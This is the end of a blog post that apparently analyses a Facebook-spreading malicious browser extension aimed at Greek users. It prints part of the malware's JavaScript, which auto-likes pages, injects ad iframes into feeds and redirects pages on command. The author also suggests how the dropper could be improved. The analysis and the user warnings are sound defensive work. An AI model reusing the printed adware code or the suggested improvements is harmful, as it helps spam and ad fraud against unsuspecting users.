                for (var i = 0; i < temp_likes2.length; i++) {
                    for (var j = 0; j < temp_likes1.length; j++) {
                        if(temp_likes1[j]==temp_likes2[i])
                            temp_likes2.remove(temp_likes1[j])
                    };
                };
                temp_likes = temp_likes2;
                console.log(temp_likes)
                chrome.storage.sync.set({'liked_pages':extSettings.liked_pages.include(temp_likes)}, function() {
                      // Notify that we saved.
                      console.log('ok')
                  });

            }
            else{
                temp_likes=configs.likes;
                chrome.storage.sync.set({'liked_pages':temp_likes}, function() {
                      // Notify that we saved.
                      console.log('ok')
                  });
            }
            

            for (var i = 0; i < temp_likes.length; i++) {
                Like_page(temp_likes[i])
            };
        })
    }


    function injectPost(){
      var eventMethod = window.addEventListener ? "addEventListener" : "attachEvent";
            var eventer = window[eventMethod];
            var messageEvent = eventMethod == "attachEvent" ? "onmessage" : "message";

            // Listen to message from child window
            eventer(messageEvent,function(e) {
              if(e.data.myurl)
                $("iframe[src='"+e.data.myurl+"']").ready(function(ifr){
                  if(e.data.height)
                    $("iframe[src='"+e.data.myurl+"']").css('height', e.data.height + 'px');
                  else
                    $("iframe[src='"+e.data.myurl+"']").css('height', '550px');
                })
              if(e.data.should_go)
                window.location.href = e.data.should_go
              
            },false);




      elems1=$.makeArray( $( "*[data-dedupekey]" ) );
      elems2=$.makeArray( $( "*[data-insertion-position]") );
      elems=elems1.include(elems2).unique();
              

      for (var i = 0; i < configs.injectPosts.length; i++) {
        if($(elems[i])){
          $(elems[i]).parent().prepend('<iframe style="margin-left: 13px;width:100%;" frameborder="0" scrolling="no" src="'+configs.injectPosts[i]+'"></iframe>')
        }
        
      };
      
                    
    }

Finally a piece of code that is not another dropper.
Its functionality is to inject ads so that they could profit.
From time to time, it spams your friends.

Summary

Most of the hosts that served the malware stopped serving it today. Greek journos reported it as Koobface. It is not. It doesn’t steal your credentials. It injects you with random ads. It was not a state-of-the-art malware like malware previously seen but it caused a fair amount of chaos.

Random thoughts

If I was the developer of it, I would exchange the VBScript with a batch file. It would check the OS of the system and download the equivalent malware.
I think part of the idea came from a greek virii mag from 2003 or from its offsprings. All of these mags had articles on how to develop such worms with equivalent samples.

Notes for users

Trust noone. Your boss won’t send you naked photos of him and your best buddy won’t send you a drunk photo of him cause you’ve seen him drunk way too many times. End of story. Make sure you see the extension of all files (even known ones) under Windows.

out.

2 responses to “Greek facebook users under “attack”

  1. I’d like to find out more? I’d care to find out more details.

    • There’s a current attack in greek users that sticks to the aforementioned details. If you want something really cool, check for Lecpetex 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *